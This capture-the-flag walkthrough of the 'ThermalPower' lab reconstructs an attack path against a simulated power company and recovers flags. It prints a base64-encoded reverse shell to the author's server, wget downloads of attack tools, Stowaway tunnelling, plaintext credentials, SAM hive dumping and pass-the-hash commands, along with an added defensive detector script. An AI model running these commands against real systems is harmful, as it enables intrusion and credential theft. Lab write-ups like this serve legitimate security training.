春秋云境 ThermalPower
This scenario simulates part of the business environment of a power-generation company. Without taking network-security threats seriously, the "火创能源" company mistakenly exposed services from sensitive zones on the public Internet, so an external APT group could reach them with ease; the services that control power distribution, production processes and other critical equipment were eventually attacked, and ransomware was deployed. The player's task is to analyse the APT group's intrusion, reconstruct its attack path following the level list, and decrypt the files encrypted by the ransomware.
Level story:
Assess the security of the services exposed on the public Internet and try to establish a foothold leading into the production zone.
After getting the target, first scan it with fscan.
Port 8080 is open.
Inspection shows the fingerprints of the Shiro framework.
The scan also finds /actuator/heapdump
file disclosure. Use the tool (https://github.com/whwlsfb/JDumpSpider/releases) to analyse the heapdump file and obtain the Shiro key.
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES
Here I chose to get a reverse shell back to my Hong Kong server:
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOC41NS45OS4xNzkvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}'
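As an added defender-side example (not part of the original writeup), a small triage script that flags process command lines which pipe a base64-decoded blob into a shell, the launcher shape used above, and decodes the payload to pull out the callback host and port. The sample log lines and the 203.0.113.5 address are constructed.

```python
import base64
import re
from typing import Optional

# Launcher shapes to catch: the brace-expansion form `{echo,<b64>}|{base64,-d}|{bash,-i}`
# and the plain `echo <b64> | base64 -d | sh` form.  Constructed pattern, not a vendor rule.
B64_PIPE_RE = re.compile(
    r"(?:\{echo,|echo\s+)(?P<b64>[A-Za-z0-9+/=]{16,})\}?"
    r"\s*\|\s*\{?base64,?\s*-d\}?\s*\|\s*\{?(?:ba)?sh"
)
# A decoded payload that opens /dev/tcp or /dev/udp is a bash reverse shell.
DEVTCP_RE = re.compile(r"/dev/(?:tcp|udp)/(?P<host>[\w.\-]+)/(?P<port>\d+)")

def decode_payload(b64: str) -> str:
    """Base64-decode the launcher's payload; return '' if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return ""

def triage(cmdline: str) -> Optional[dict]:
    """Return a finding for a suspicious command line, or None for a clean one."""
    m = B64_PIPE_RE.search(cmdline)
    if not m:
        return None
    decoded = decode_payload(m.group("b64"))
    finding = {"technique": "base64-piped-shell", "decoded": decoded, "callback": None}
    t = DEVTCP_RE.search(decoded)
    if t:
        finding["technique"] = "reverse-shell-dev-tcp"
        finding["callback"] = (t.group("host"), int(t.group("port")))
    return finding

def scan(lines):
    """Run triage over process-creation log lines; keep only the hits."""
    return [(line, f) for line in lines if (f := triage(line)) is not None]

# Constructed sample log lines.  203.0.113.5 is a documentation address, not a real listener.
_REV = base64.b64encode(b"bash -i >& /dev/tcp/203.0.113.5/4444 0>&1").decode()
_BENIGN = base64.b64encode(b"echo hello from base64").decode()
SAMPLE_LOGS = [
    "tar czf /tmp/logs.tgz /var/log",
    f"bash -c '{{echo,{_REV}}}|{{base64,-d}}|{{bash,-i}}'",
    f"sh -c 'echo {_BENIGN} | base64 -d | sh'",
]

if __name__ == "__main__":
    for line, finding in scan(SAMPLE_LOGS):
        print(finding["technique"], finding["callback"], "<-", line)
```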
Level story:
Try to take over the SCADA engineer's personal PC and escalate to SYSTEM by abusing a Windows privileged group.
Then upload fscan
and Stowaway
(https://github.com/ph4ntonn/Stowaway/releases/tag/v2.2)
cd /tmp
wget http://38.55.99.xxx/fscan
wget http://38.55.99.xxx/linux_x64_agent
chmod +x *
root@security:/tmp# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.17.213 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe38:eec4 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:38:ee:c4 txqueuelen 1000 (Ethernet)
RX packets 74686 bytes 99914210 (99.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24809 bytes 33634693 (33.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 608 bytes 51983 (51.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 608 bytes 51983 (51.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@security:/tmp# ./fscan -h 172.22.17.213/24
./fscan -h 172.22.17.213/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.17.6 is alive
(icmp) Target 172.22.17.213 is alive
[*] Icmp alive hosts len is: 2
172.22.17.6:21 open
172.22.17.213:8080 open
172.22.17.6:80 open
172.22.17.6:445 open
172.22.17.6:139 open
172.22.17.6:135 open
172.22.17.213:22 open
[*] alive ports len is: 7
start vulscan
[*] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER
[*] NetInfo
[*]172.22.17.6
[->]WIN-ENGINEER
[->]172.22.17.6
[+] ftp 172.22.17.6:21:anonymous
[->]Modbus
[->]PLC
[->]web.config
[->]WinCC
[->]内部软件
[->]火创能源内部资料
[*] WebTitle http://172.22.17.213:8080 code:302 len:0 title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=8FAC38FB81A8F630687436CF16FBF1B6
[*] WebTitle http://172.22.17.213:8080/login;jsessionid=8FAC38FB81A8F630687436CF16FBF1B6 code:200 len:2936 title:火创能源监控画面管理平台
[*] WebTitle http://172.22.17.6 code:200 len:661 title:172.22.17.6 - /
[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2
Then use Stowaway
as the internal-network proxy:
the admin runs on the server and the agent on the target.
Server: ./linux_x64_admin -l 1234 -s 123
Target: ./linux_x64_agent -c 39.107.115.xxx:1234 -s 123 --reconnect 8
use 0
socks 5555
With the tunnel up, our server can reach internal network 1. Set up a global proxy with Proxifier so that internal resources can be accessed from the local machine.
If you are working from a VM, remember to edit the proxy configuration file:
sudo vim /etc/proxychains4.conf
last line:
socks xxx.xxx.xxx.xxx 5555
Once configured, it can be viewed in the local browser. There is an anonymous FTP server here; it can also be reached with an ftp client, but I just browsed it directly.
/SCADA.txt
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3
Download all the material. The hint shows there is another subnet, so scan it with fscan again.
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.26.11 is alive
[*] Icmp alive hosts len is: 1
172.22.26.11:139 open
172.22.26.11:1433 open
172.22.26.11:445 open
172.22.26.11:135 open
172.22.26.11:80 open
[*] alive ports len is: 5
start vulscan
[*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11
[->]WIN-SCADA
[->]172.22.26.11
[*] WebTitle http://172.22.26.11 code:200 len:703 title:IIS Windows Server
已完成 5/5
[*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11
The weak database password is brute-forced right away.
From 内部员工通讯录.xlsx
we obtain the employee information:
and the default password rule:
[*] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER
[*] NetInfo
[*]172.22.17.6
[->]WIN-ENGINEER
[->]172.22.17.6
First connect remotely to 172.22.17.6
using the SCADA engineer's account:
chenhua
chenhua@0813
I wanted to view the file but got a permission error saying admin is required, so run cmd as administrator and check the privileges:
C:\Windows\system32> whoami
win-engineer\chenhua
C:\Windows\system32> whoami /priv
特权信息
----------------------
特权名 描述 状态
============================= ============== ======
SeBackupPrivilege 备份文件和目录 已禁用
SeRestorePrivilege 还原文件和目录 已禁用
SeShutdownPrivilege 关闭系统 已禁用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用
Save the SAM and SYSTEM registry hives:
C:\Users\chenhua\Desktop> reg save hklm\sam sam.hive
操作成功完成。
C:\Users\chenhua\Desktop> reg save hklm\system system.hive
操作成功完成。
Use impacket-secretsdump to extract the NTLM hashes from the registry hive dumps:
root@kali-server:~# impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x6c2be46aaccdf65a9b7be2941d6e7759
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f82292b7ac79b05d5b0e3d302bd0d279:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a2fa2853651307ab9936cc95c0e0acf5:::
chentao:1000:aad3b435b51404eeaad3b435b51404ee:47466010c82da0b75328192959da3658:::
zhaoli:1001:aad3b435b51404eeaad3b435b51404ee:2b83822caab67ef07b614d05fd72e215:::
wangning:1002:aad3b435b51404eeaad3b435b51404ee:3c52d89c176321511ec686d6c05770e3:::
zhangling:1003:aad3b435b51404eeaad3b435b51404ee:8349a4c5dd1bdcbc5a14333dd13d9f81:::
zhangying:1004:aad3b435b51404eeaad3b435b51404ee:8497fa5480a163cb7817f23a8525be7d:::
lilong:1005:aad3b435b51404eeaad3b435b51404ee:c3612c48cf829d1149f7a4e3ef4acb8a:::
liyumei:1006:aad3b435b51404eeaad3b435b51404ee:63ddcde0fa219c75e48e2cba6ea8c471:::
wangzhiqiang:1007:aad3b435b51404eeaad3b435b51404ee:5a661f54da156dc93a5b546ea143ea07:::
zhouyong:1008:aad3b435b51404eeaad3b435b51404ee:5d49bf647380720b9f6a15dbc3ffe432:::
chenhua:1009:aad3b435b51404eeaad3b435b51404ee:07ff24422b538b97f3c297cc8ddc7615:::
[*] Cleaning up...
Attack using the administrator's hash:
root@kali-server:~# proxychains4 -q nxc smb 172.22.17.6 -u Administrator -H f82292b7ac79b05d5b0e3d302bd0d279
SMB 172.22.17.6 445 WIN-ENGINEER [*] Windows 10.0 Build 20348 x64 (name:WIN-ENGINEER) (domain:WIN-ENGINEER) (signing:False) (SMBv1:False)
SMB 172.22.17.6 445 WIN-ENGINEER [+] WIN-ENGINEER\Administrator:f82292b7ac79b05d5b0e3d302bd0d279 (Pwn3d!)
root@kali-server:~# proxychains4 -q nxc smb 172.22.17.6 -u Administrator -H f82292b7ac79b05d5b0e3d302bd0d279 -X 'type ~/flag/flag02.txt'
SMB 172.22.17.6 445 WIN-ENGINEER [*] Windows 10.0 Build 20348 x64 (name:WIN-ENGINEER) (domain:WIN-ENGINEER) (signing:False) (SMBv1:False)
SMB 172.22.17.6 445 WIN-ENGINEER [+] WIN-ENGINEER\Administrator:f82292b7ac79b05d5b0e3d302bd0d279 (Pwn3d!)
SMB 172.22.17.6 445 WIN-ENGINEER [+] Executed command via wmiexec
SMB 172.22.17.6 445 WIN-ENGINEER _____.__ _______ ________
SMB 172.22.17.6 445 WIN-ENGINEER _/ ____\ | _____ ____ \ _ \ \_____ \
SMB 172.22.17.6 445 WIN-ENGINEER \ __\| | \__ \ / ___\/ /_\ \ / ____/
SMB 172.22.17.6 445 WIN-ENGINEER | | | |__/ __ \_/ /_/ > \_/ \/ \
SMB 172.22.17.6 445 WIN-ENGINEER |__| |____(____ /\___ / \_____ /\_______ \
SMB 172.22.17.6 445 WIN-ENGINEER \//_____/ \/ \/
SMB 172.22.17.6 445 WIN-ENGINEER
SMB 172.22.17.6 445 WIN-ENGINEER
SMB 172.22.17.6 445 WIN-ENGINEER flag02: flag{cd0f626c-d89d-4d86-8a34-c05fabce7b51}
Level story:
Try to take over the SCADA engineer station and start the boiler.
The subnet discovered by the scan after the remote connection:
[*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11
The account and password for the connection are these:
/SCADA.txt
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3
Starting the boiler yields flag3.
Level story:
Try to obtain the database backup on the SCADA engineer station and analyse whether the backup file leaks sensitive data.
Press Win+D to return to the desktop, where the ransomware has appeared.
An encrypted file ScadaDB.sql.locky is found on the desktop.
The ransomware exe is then found on the C: drive.
Load it into dnSpy for analysis: the program encrypts files with AES.
The encryptedAesKey and privateKey files provided on the netdisk at the very beginning are used to decrypt the challenge attachment.
For the RSA part, first convert the XML key to PEM: https://www.ssleye.com/ssltool/pem_xml.html
With the private key, decrypt the RSA ciphertext: https://www.lddgo.net/encrypt/rsa
which finally gives
cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk=
The final decryption script:
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64

# Read the encrypted file
encrypted_file = 'ScadaDB.sql.locky'
with open(encrypted_file, 'rb') as file:
    encrypted_data = file.read()

# Decryption key (the AES key recovered from the RSA step above)
key = 'cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk='
key = base64.b64decode(key)

# The first 16 bytes of the file are the IV
iv = encrypted_data[:16]

# Create the AES-CBC decryptor
cipher = AES.new(key, AES.MODE_CBC, iv=iv)

# Decrypt the remainder (everything after the IV) and strip the PKCS#7 padding
decrypted_data = unpad(cipher.decrypt(encrypted_data[16:]), AES.block_size)

# Write the decrypted content to a new file
decrypted_file = 'decrypted_file.txt'
with open(decrypted_file, 'wb') as file:
    file.write(decrypted_data)

print(f'文件解密完成,解密后的数据已保存到 {decrypted_file}')
This yields flag4.
Badge obtained.